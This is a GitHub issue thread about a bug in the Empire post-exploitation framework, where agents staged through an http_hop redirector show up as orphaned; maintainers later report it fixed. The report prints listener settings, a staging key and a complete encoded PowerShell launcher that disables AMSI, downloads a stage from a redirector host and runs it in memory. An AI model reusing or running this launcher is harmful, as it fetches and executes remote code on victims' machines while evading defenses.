### ISSUE TITLE
Agents staged via http_hop always appear as orphaned

### ISSUE THREAD

**Issue by atkinsj** [adaptivethreat/Empire#339]
## Empire Version
2.0_beta

## OS Information (Linux flavor, Python version)
Kali rolling, Windows 8.1 agent host, Windows Server 2012 R2 running XAMPP 1.7.3 as the hop.php redirector

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
**Start a new HTTP listener**

```
http Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  KillDate          False                                        Date for the listener to exit (MM/dd/yyyy).
  Name              True        http                             Name for the listener.
  DefaultProfile    True        /admin/get.php,/news.php,/login/ Default communication profile for the agent.
                                process.php|Mozilla/5.0 (Windows
                                NT 6.1; WOW64; Trident/7.0;
                                rv:11.0) like Gecko
  DefaultLostLimit  True        60                               Number of missed checkins before exiting
  DefaultDelay      True        5                                Agent delay/reach back interval (in seconds).
  Host              True        https://192.168.0.118:443        Hostname/IP for staging.
  Port              True        443                              Port for the listener.
  WorkingHours      False                                        Hours for the agent to operate (09:00-17:00).
  CertPath          False       /root/empire/data/empire.pem     Certificate path for https listeners.
  DefaultJitter     True        0.0                              Jitter in agent reachback interval (0.0-1.0).
  StagingKey        True        k#LPT};laS.GC7p!F5<>@4*NEmbf+|gU Staging key for initial agent negotiation.
  BindIP            True        0.0.0.0                          The IP to bind to on the control server.
  ServerVersion     True        Microsoft-IIS/7.5                TServer header for the control server.

```

**Build a new http_hop listener**
http_hop Options:

  ```
Name              Required    Value                            Description
  ----              --------    -------                          -----------
  RedirectListener  True        http                             Existing listener to redirect the hop traffic to.
  Name              True        http_hop                         Name for the listener.
  RedirectStagingKeyFalse       k#LPT};laS.GC7p!F5<>@4*NEmbf+|gU The staging key for the redirect listener, extracted from RedirectListener automatically.
  Host              True        http://10.0.0.2                  Hostname/IP for staging.
  OutFolder         True        /tmp/http_hop/                   Folder to output redirectors to.
  DefaultProfile    False       /admin/get.php,/news.php,/login/ Default communication profile for the agent, extracted from RedirectListener automatically.
                                process.php|Mozilla/5.0 (Windows
                                NT 6.1; WOW64; Trident/7.0;
                                rv:11.0) like Gecko
  Port              True        80                               Port for the listener.

(Empire: listeners/http_hop) > execute
[*] Starting listener 'http_hop'
[*] Hop redirector written to /tmp/http_hop//admin/get.php . Place this file on the redirect server.
[*] Hop redirector written to /tmp/http_hop//news.php . Place this file on the redirect server.
[*] Hop redirector written to /tmp/http_hop//login/process.php . Place this file on the redirect server.
```

Drop files on hop.php redirector at 10.0.0.2 and confirmed they are present

Generate PowerShell launcher:

`(Empire: listeners) > launcher powershell http_hop
powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBSAEUARgBdAC4AQQBTAHMARQBNAEIATAB5AC4ARwBFAFQAVABZAHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAVABGAEkARQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBMAFUAZQAoACQAbgBVAEwATAAsACQAVAByAHUARQApAH0AOwBbAFMAWQBzAHQARQBtAC4ATgBFAHQALgBTAEUAcgBWAGkAQwBlAFAAbwBpAE4AdABNAGEAbgBhAEcARQByAF0AOgA6AEUAeABwAEUAYwBUADEAMAAwAEMAbwBOAFQASQBuAFUARQA9ADAAOwAkAFcAYwA9AE4ARQB3AC0ATwBCAEoAZQBjAHQAIABTAFkAUwB0AGUATQAuAE4ARQBUAC4AVwBlAEIAQwBMAGkAZQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAB3AGMALgBIAGUAQQBEAGUAUgBTAC4AQQBEAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AEMALgBQAFIATwB4AFkAPQBbAFMAWQBTAFQAZQBNAC4ATgBlAFQALgBXAGUAQgBSAGUAUQBVAEUAcwBUAF0AOgA6AEQAZQBGAEEAVQBMAFQAVwBlAGIAUABSAE8AeAB5ADsAJABXAEMALgBQAFIATwB4AFkALgBDAHIAZQBEAEUAbgB0AEkAQQBMAFMAIAA9ACAAWwBTAFkAUwBUAEUATQAuAE4ARQB0AC4AQwByAEUARABFAG4AdABJAGEAbABDAEEAQwBIAEUAXQA6ADoARABlAEYAQQB1AEwAVABOAGUAVABXAG8AcgBrAEMAcgBlAEQARQBOAFQASQBBAEwAcwA7ACQASwA9AFsAUwB5AHMAVABlAG0ALgBUAEUAWABUAC4ARQBuAGMATwBEAGkATgBHAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAeQBUAEUAUwAoACcAawAjAEwAUABUAH0AOwBsAGEAUwAuAEcAQwA3AHAAIQBGADUAPAA+AEAANAAqAE4ARQBtAGIAZgArAHwAZwBVACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBPAHUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAVwBjAC4ASABFAEEARABlAHIAUwAuAEEARABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0ARQBhAHkAeQBOADEAMAAxAHoAMABiAE4AWgBGAHUAbgAyAEoAcAB6ADAANAB1ADIAUwA2AEEAPQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAMAAuADAALgAwAC4AMgAnADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQARABhAHQAYQA9ACQAVwBDAC4ARABvAFcAbgBsAG8AQQBEAEQAQQB0AGEAKAAkAHMAZQByACsAJAB0ACkAOwAkAEkAdgA9ACQARABBAHQAYQBbADAALgAuADMAXQA7ACQARABBAHQAYQA9ACQARABBAFQAYQBbADQALgAuACQAZABhAHQAQQAuAEwARQBuAEcAVABoAF0AOwAtAGoATwBpAE4AWwBDAGgAYQByAFsAXQBdACgAJgAgACQAUgAgACQAZABhAHQAQQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA
`

Execute launcher with administrative privileges on a Windows 8.1 workstation host

`(Empire: listeners) > [*] Orphaned agent from 192.168.0.116, signaling retaging`

Note: a ./setup/reset.sh was run before setting up new listeners and the Windows 8.1 host was rebooted.

Any ideas for troubleshooting?

**Comment by mandreko** [comment]
I'm having this exact same issue. My test system is Windows 7, but exactly the same otherwise.

**Comment by rvrsh3ll** [comment]
I have confirmed this issue and will be working on a solution. Thank you for the submission!

**Comment by mandreko** [comment]
Is there any immediate workaround I can use to start up an active engagement? I haven't dug into the code enough to see what is happening, or to know if it's super complicated or something silly.

**Comment by rvrsh3ll** [comment]
Yes, can you hit me up on our slack channel? http://adaptiveempire.herokuapp.com/

**Comment by rvrsh3ll** [comment]
This should be fixed now. @HarmJ0y fixed a bug in http_hop.py. Closing for now. Please let us know if you have any further issues and thanks for the submission.
